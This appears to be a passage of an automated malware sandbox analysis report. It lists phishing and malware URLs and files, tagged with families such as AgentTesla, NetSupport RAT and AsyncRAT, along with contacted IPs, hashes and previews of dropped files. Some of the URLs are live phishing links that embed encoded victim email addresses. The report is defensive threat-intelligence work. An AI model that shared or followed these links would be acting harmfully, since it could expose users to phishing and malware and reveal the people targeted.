                                                                                                                        https://www.mavengroupglobal.uk/DYuPhO4h/v?url=qs6eqSurmcWXoQKf6zcjhg6iePdEghHaDt49dq0x39xgLRd6M1#qs6eqSurmcWXoQKf6zcjhg6iePdEghHaDt49dq0x39xgLRd6M1EFEEZ2FicmllbC5wYXJ2dWxlc2N1QGRldXRzY2hlYmFobi5jb20=Get hashmaliciousUnknownBrowse
                                                                                                                        • 23.1.237.91
                                                                                                                        http://ipscanadvsf.comGet hashmaliciousUnknownBrowse
                                                                                                                        • 23.1.237.91
                                                                                                                        https://functional-adhesive-titanium.glitch.me/Get hashmaliciousUnknownBrowse
                                                                                                                        • 23.1.237.91
                                                                                                                        https://www.canva.com/design/DAGDNh45X_4/PPCLYIV4Y8uUaoEW7ZJrJQ/view?utm_content=DAGDNh45X_4&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                                                                                        • 23.1.237.91
                                                                                                                        https://bind.bestresulttostart.com/scripts/statistics.js?s=7.8.2Get hashmaliciousUnknownBrowse
                                                                                                                        • 23.1.237.91
                                                                                                                        SWIFT.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                        • 23.1.237.91
                                                                                                                        https://docs.google.com/presentation/d/e/2PACX-1vRA7cYu2pjKyfaCRROgTu4J2OpPGWE_raEqtGhCVl21QDvJzZsVPQtIU_FG6khcCjqxbwzOTOoBBBx6/pub?start=false&loop=false&delayms=3000&slide=id.pGet hashmaliciousUnknownBrowse
                                                                                                                        • 23.1.237.91
                                                                                                                        http://rfpteams.ksplastlc.netGet hashmaliciousUnknownBrowse
                                                                                                                        • 23.1.237.91
                                                                                                                        3b5074b1b5d032e5620f69f9f700ff0ehttps://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 142.251.15.132
                                                                                                                        • 149.154.167.220
                                                                                                                        • 172.67.74.152
                                                                                                                        http://wsj.pmGet hashmaliciousNetSupport RATBrowse
                                                                                                                        • 142.251.15.132
                                                                                                                        • 149.154.167.220
                                                                                                                        • 172.67.74.152
                                                                                                                        Isass.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • 142.251.15.132
                                                                                                                        • 149.154.167.220
                                                                                                                        • 172.67.74.152
                                                                                                                        https://itniy4gbb.cc.rs6.net/tn.jsp?f=001DpCT81a7BIE926OduG6KmKkwKebSAbUZq28C52DoY-FfQJyM_2Gq3l18V1j7KWwJQTfGlQ_HSq0vC8xqJqFST9z0CwmpWgUieBjKckdJcSODJ_3vu5MzvaSoOGbGY9SjpWQtg9-aAXm1e6VV91z84Q2_wlyDMR98&c=i37ZFF5Dy2QSFqOfb2TVpr5vkMFqaR6DdoQbIhzcRV7G2oFwX8NEvA==&ch=2ErEiCYnoykaXa1uoD0AgTD1vOpSqc6zh3ef32Gb4XR_ut8_qvmzHA==&c=&ch=&__=/mrlZp0zmTKgGvsPpx0JUyCMjGZr4J6/Z2dvbnphbGV6c2FsYXNAc2FuaXRhcy5lcw==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 142.251.15.132
                                                                                                                        • 149.154.167.220
                                                                                                                        • 172.67.74.152
                                                                                                                        SecuriteInfo.com.Win32.PWSX-gen.18376.4403.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                        • 142.251.15.132
                                                                                                                        • 149.154.167.220
                                                                                                                        • 172.67.74.152
                                                                                                                        Minutes_of_15th_Session_of_PSC.pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • 142.251.15.132
                                                                                                                        • 149.154.167.220
                                                                                                                        • 172.67.74.152
                                                                                                                        Minutes_of_15th_Session_of_PSC.pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • 142.251.15.132
                                                                                                                        • 149.154.167.220
                                                                                                                        • 172.67.74.152
                                                                                                                        SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                        • 142.251.15.132
                                                                                                                        • 149.154.167.220
                                                                                                                        • 172.67.74.152
                                                                                                                        Database4.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • 142.251.15.132
                                                                                                                        • 149.154.167.220
                                                                                                                        • 172.67.74.152
                                                                                                                        UMJLhijN4z.exeGet hashmaliciousAsyncRAT, Prynt Stealer, StormKitty, WorldWind StealerBrowse
                                                                                                                        • 142.251.15.132
                                                                                                                        • 149.154.167.220
                                                                                                                        • 172.67.74.152
                                                                                                                        No context
                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1310720
                                                                                                                        Entropy (8bit):0.830716815425097
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugq:gJjJGtpTq2yv1AuNZRY3diu8iBVqFw
                                                                                                                        MD5:7FF2FBCC7016A934A1D1E7BC41E3FEFE
                                                                                                                        SHA1:CD3DCBD6F1B4878FB6C77F1FBD940043AC949D3F
                                                                                                                        SHA-256:9EBA82080390D9DF80522F4578380F05AD9FDD448A825476FE705A0223C21114
                                                                                                                        SHA-512:4B6C77BB6E6A4D713B60FEA0A8EF824A26695C530E4CB5FA38C01D4B8D37225A20D1822F8336D1AC72273555E17F66FB4D23DE9F40C14ED03C90107EE06534D8
                                                                                                                        Malicious:false
                                                                                                                        Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x0d960b90, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1310720
                                                                                                                        Entropy (8bit):0.6585882988185752
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:ZSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:Zaza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                                                        MD5:1FC211FCEE986FF7DC70E3B4C3783B29
                                                                                                                        SHA1:7FD90BD756C32835DD2613B7FE6EC54703D79422
                                                                                                                        SHA-256:B4738337A9A06BE793C3E38F732D2F444F6701FA2D278D90A59A04DEE1EE0D56
                                                                                                                        SHA-512:CAC9AE0DE2BB643BE779C1E175E14AB19A8A7D9DDDB1D47D1D8B753F219D902824E4F5A21A149900B73AFB6767642DCC24AB8D71D15AB1F77A761B23B5506DC1
                                                                                                                        Malicious:false
                                                                                                                        Preview:....... ...............X\...;...{......................0.z..........{.......|O.h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{.....................................Y.....|O.................>.x}.....|O..........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):16384
                                                                                                                        Entropy (8bit):0.08166291377185073
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:4SllyYeNvwkbGuAJkhvekl1Dpl/lAllrekGltll/SPj:ZyzNHbrxlptAJe3l
                                                                                                                        MD5:43C9FA5C6C8999EA624264384D389EF2
                                                                                                                        SHA1:7C3212BA84E0933E1D09B1C76AAB25442719C84E
                                                                                                                        SHA-256:5DEFD7BC28B583CFBBD7E700EFB7C3552EAAFABFE0D8754493B518B2CD9D5794
                                                                                                                        SHA-512:0FDE8A47C46750F1EA48BE022BA1F95940384150B169F1393FA74B35F40AF8655ED66A926A634844000441280F90C5F041B485F730DB374B4BA253C94947E8B3
                                                                                                                        Malicious:false
                                                                                                                        Preview:._R......................................;...{.......|O......{...............{.......{...XL......{..................>.x}.....|O.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):65536
                                                                                                                        Entropy (8bit):0.8016212931248858
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:7DuDpe3uSRvT0ia5m9TMlzuiF4Z24IO8:WdSRvT3avzuiF4Y4IO8
                                                                                                                        MD5:26237C47C1AF24A1DC5347C294D9B314
                                                                                                                        SHA1:BB8C108436AC745FD1904917EFF8DABF7D97CD24
                                                                                                                        SHA-256:F6844DA89B867A72A5925063339D822E68E5434BA86B6297ED65AE196075C548
                                                                                                                        SHA-512:D5C8F94E9553259C961CADBB57098378FCB4C097742C5CC9AC3F0D7EC3A6906F24F175CB0EB68EA98353C5E54AA4B05A0ADC030BAE421967CDF380DDBAA3EC43
                                                                                                                        Malicious:false
                                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.3.8.0.7.9.6.0.7.0.4.0.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.3.8.0.8.0.4.5.0.7.9.0.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.2.6.1.f.9.8.2.-.6.5.5.b.-.4.a.3.7.-.a.c.b.2.-.6.2.d.f.c.0.0.2.0.4.7.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.M.S.B.u.i.l.d...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.c.c.-.0.0.0.1.-.0.0.1.4.-.c.0.7.7.-.5.9.3.1.3.2.9.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.4.3.5.3.8.8.1.e.7.f.4.e.9.c.7.6.1.0.f.4.e.0.4.8.9.1.8.3.b.5.5.b.b.5.8.b.b.5.7.4.!.M.S.B.u.i.l.d...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.9././.1.0././.2.5.:.0.4.:.1.8.:.5.7.!.1.d.d.5.0.!.M.S.B.u.i.l.d...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):65536
                                                                                                                        Entropy (8bit):0.8015944732184409
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:96:BVFUZeaAuNRs9lqHzxOMb5dQXIFdk+BHUHZopAnQHdE7HeSVcf+xnj+dF9yOyW0F:zCZe3uNRvT0ia5m9TMlzuiF4Z24IO8x
                                                                                                                        MD5:3296E92CD1911DF10C738247950616FC
                                                                                                                        SHA1:AD588E6CCC0417BC8048DC18915C50FAF8335211
                                                                                                                        SHA-256:F3F98770212A6FE0F45D9DBD857D79814E0062BEA9E8F047DA5702895FFBCE48
                                                                                                                        SHA-512:46B34A2BBE0A20D7004641FA41FFF385157E8B6B290EFEBFBE3449A779BD03423FE98951D9609F2F71288E438F4DBBC44186D177F42571ADE1EF0184C256441B
                                                                                                                        Malicious:false
                                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.3.8.0.7.9.6.2.1.1.5.7.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.3.8.0.8.0.4.6.4.9.1.2.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.f.b.0.8.8.d.1.-.9.e.2.0.-.4.5.1.7.-.9.a.5.7.-.f.c.1.2.0.c.8.b.9.2.8.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.M.S.B.u.i.l.d...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.4.4.c.-.0.0.0.1.-.0.0.1.4.-.a.3.3.b.-.5.1.3.1.3.2.9.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.4.3.5.3.8.8.1.e.7.f.4.e.9.c.7.6.1.0.f.4.e.0.4.8.9.1.8.3.b.5.5.b.b.5.8.b.b.5.7.4.!.M.S.B.u.i.l.d...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.9././.1.0././.2.5.:.0.4.:.1.8.:.5.7.!.1.d.d.5.0.!.M.S.B.u.i.l.d...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):7622
                                                                                                                        Entropy (8bit):3.7049796276777447
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:R6l7wVeJZR6LW6Y2ySUegmfhC1p1qa1fgPOm:R6lXJ/666YTSUegmfhCZqwfo
                                                                                                                        MD5:85C3F56777A84FCB270103A43C60FAFE
                                                                                                                        SHA1:955488F1B1908516BF691A2C0CCA0A2E4DEAEDA0
                                                                                                                        SHA-256:F051CBC36DD09FE9A58DCDE2C3D3379AE432F83069835E5076F3A4F6050D289C
                                                                                                                        SHA-512:35D85452FAE39A0A5476D812193B626EFDF9488795CCB31499BB0BF7DEA4FC4CF5C4197B8D8BE09FAF245EB9CD53D3797E65C3FC4F766F2C6D5828478CBC253A
                                                                                                                        Malicious:false
                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.8.3.6.<./.P.i.
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):7622
                                                                                                                        Entropy (8bit):3.7050656558098565
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:R6l7wVeJJ860K6Y2uSUegmfhC1p1qV1fIOm:R6lXJy6h6Y/SUegmfhCZq3f4
                                                                                                                        MD5:E78DF67587A91380F10C1202120C9705
                                                                                                                        SHA1:C214F746653ED5B6C1F83A48C05950525F2D16A4
                                                                                                                        SHA-256:1D23D583B40139E2D278B93D74C5A77B88AD2A246E2B25A9064F76E57007DD27
                                                                                                                        SHA-512:8E68FC04D90E92D5427D1643591E4FFA857AA00DA91B44CB0DB354AA8483F9F542E87073958DDE9F67620F8D2FC3B01BEB6F73C0CF297D554F4DE02B32244182
                                                                                                                        Malicious:false
                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.1.0.0.<./.P.i.
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):4614
                                                                                                                        Entropy (8bit):4.494763745469648
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:cvIwWl8zsUJg77aI9tKWpW8VYZPYm8M4JFKf7axiFm+q8L/slnk8gkd:uIjfSI7zr7VQSJFKk9aQnk8gkd
                                                                                                                        MD5:19E9FF7CF3B0D5E6A131AEF4406A9FB3
                                                                                                                        SHA1:77C4550C1D08B0050A0F70BFFC3C7ED9603A2416
                                                                                                                        SHA-256:AFD3EE6A04EC33E5ED3368C3D463564F98CD7E87CF23853255C07D29A6514CBE
                                                                                                                        SHA-512:2F6CCCB2C4866C8D3F0AA25F53EFAA79681026417768BD156C42261A781A6A23A6DFA0E90EB5A56245D024CC1BB22753ACEBD280BC98F5301FF88497147FF691
                                                                                                                        Malicious:false
                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="295684" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):4614
                                                                                                                        Entropy (8bit):4.495347386274018
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:cvIwWl8zsUJg77aI9tKWpW8VYTYm8M4JFKf7axiF0+q8L/sZnk8gXd:uIjfSI7zr7VrJFKkHaknk8gXd
                                                                                                                        MD5:604FB848D4DEC95954A8E25620643D55
                                                                                                                        SHA1:4860A063C903E229FBD93E1D520B5B25C592079D
                                                                                                                        SHA-256:B8D190DB9A5A38F66402DACB8AF142C4B3802E1BBD57920E28E9E0B4D84CC8C4
                                                                                                                        SHA-512:3896C770BA3C10FA41C032422541FC6CBC4262501909A8A529CE280996152FAFDEE35BA63B8DCF37909D071945445326BD32D5598E7B7FFADA0B590A7B9A13C1
                                                                                                                        Malicious:false
                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="295684" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:ASCII text, with very long lines (65535)
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):4045460
                                                                                                                        Entropy (8bit):2.39103440552274
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3072:bR69Sqe86QEjrBRYh+bPyML500Q5/hSP2HwYhExjDMI8xYluuibk5M5Tx4juSGT2:T
                                                                                                                        MD5:8836EA97B19F38697FDC5ABA802DA2CD
                                                                                                                        SHA1:534969E661337D6BE8C23AE1415EC2F761061FE7
                                                                                                                        SHA-256:E2EBFCCFFC4AB283858C6E57CCD88D676BE070FAE1E96C2ED82DFCFCDB1C1346
                                                                                                                        SHA-512:9E24FCFAC6E45C529FF5F001E10CB11E19A54822387D6CE9F66912DC8956C93845B5C1240E8628595E78FA6C846C28B042DC59211246861CB2722AB870C21D62
                                                                                                                        Malicious:false
                                                                                                                        Preview:.$muthal = "****************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************
                                                                                                                        Process:C:\Windows\System32\mshta.exe
                                                                                                                        File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):3249
                                                                                                                        Entropy (8bit):5.4598794938059125
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:96:vKFrZ/kxjqD9zqp36wxVJddFAdd5Ydddopdyddv+dd865FhlleXckVDuca:CGpv+GkduSDl6LRa
                                                                                                                        MD5:939A9FBD880F8B22D4CDD65B7324C6DB
                                                                                                                        SHA1:62167D495B0993DD0396056B814ABAE415A996EE
                                                                                                                        SHA-256:156E7226C757414F8FD450E28E19D0A404FDBA2571425B203FDC9C185CF7FF0E
                                                                                                                        SHA-512:91428FFA2A79F3D05EBDB19ED7F6490A4CEE788DF709AB32E2CDC06AEC948CDCCCDAEBF12555BE4AD315234D30F44C477823A2592258E12D77091FA01308197B
                                                                                                                        Malicious:false
                                                                                                                        Preview:...<HTML id=dlgError STYLE="font-family: ms sans serif; font-size: 8pt;..width: 41.4em; height: 24em">..<HEAD>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<META HTTP-EQUIV="MSThemeCompatible" CONTENT="Yes">..<TITLE id=dialogTitle>..Script Error..</TITLE>..<SCRIPT>..var L_Dialog_ErrorMessage = "An error has occurred in this dialogue.";..var L_ErrorNumber_Text = "Error: ";..var L_ContinueScript_Message = "Do you want to debug the current page?";..var L_AffirmativeKeyCodeLowerCase_Number = 121;..var L_AffirmativeKeyCodeUpperCase_Number = 89;..var L_NegativeKeyCodeLowerCase_Number = 110;..var L_NegativeKeyCodeUpperCase_Number = 78;..</SCRIPT>..<SCRIPT LANGUAGE="JavaScript" src="error.js" defer></SCRIPT>..</HEAD>..<BODY ID=bdy onLoad="loadBdy()" style="font-family: 'ms sans serif';..font-size: 8pt; background: threedface; color: windowtext;" topmargin=0>..<CENTER id=ctrErrorMessage>..<table id=tbl1 cellPadding=3 cellspacing=3 border=0..style="background: buttonfa
                                                                                                                        Process:C:\Windows\System32\mshta.exe
                                                                                                                        File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):3249
                                                                                                                        Entropy (8bit):5.4598794938059125
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:96:vKFrZ/kxjqD9zqp36wxVJddFAdd5Ydddopdyddv+dd865FhlleXckVDuca:CGpv+GkduSDl6LRa
                                                                                                                        MD5:939A9FBD880F8B22D4CDD65B7324C6DB
                                                                                                                        SHA1:62167D495B0993DD0396056B814ABAE415A996EE
                                                                                                                        SHA-256:156E7226C757414F8FD450E28E19D0A404FDBA2571425B203FDC9C185CF7FF0E
                                                                                                                        SHA-512:91428FFA2A79F3D05EBDB19ED7F6490A4CEE788DF709AB32E2CDC06AEC948CDCCCDAEBF12555BE4AD315234D30F44C477823A2592258E12D77091FA01308197B
                                                                                                                        Malicious:false
                                                                                                                        Preview:...<HTML id=dlgError STYLE="font-family: ms sans serif; font-size: 8pt;..width: 41.4em; height: 24em">..<HEAD>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<META HTTP-EQUIV="MSThemeCompatible" CONTENT="Yes">..<TITLE id=dialogTitle>..Script Error..</TITLE>..<SCRIPT>..var L_Dialog_ErrorMessage = "An error has occurred in this dialogue.";..var L_ErrorNumber_Text = "Error: ";..var L_ContinueScript_Message = "Do you want to debug the current page?";..var L_AffirmativeKeyCodeLowerCase_Number = 121;..var L_AffirmativeKeyCodeUpperCase_Number = 89;..var L_NegativeKeyCodeLowerCase_Number = 110;..var L_NegativeKeyCodeUpperCase_Number = 78;..</SCRIPT>..<SCRIPT LANGUAGE="JavaScript" src="error.js" defer></SCRIPT>..</HEAD>..<BODY ID=bdy onLoad="loadBdy()" style="font-family: 'ms sans serif';..font-size: 8pt; background: threedface; color: windowtext;" topmargin=0>..<CENTER id=ctrErrorMessage>..<table id=tbl1 cellPadding=3 cellspacing=3 border=0..style="background: buttonfa
                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):47721
                                                                                                                        Entropy (8bit):5.076853549369968
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:JQDWxeV3IpNBQkj2Nh4iUxgaVrfrRJv5FkvQOZhJHIeaardFHXwdOdBJNLzItAHs:+DweV3CNBQkj2Nh4iUxgaVrflJnkvQOM
                                                                                                                        MD5:EDE6B3F24EA7BE15563286F40FC4E154
                                                                                                                        SHA1:A1AAC33614FF3D10E4F91C1FE7A386D15AA629D8
                                                                                                                        SHA-256:0CA18ED43FBACE5B2CD84E02292F9DA7A879069BDC7C89FF36A02D411D467BA9
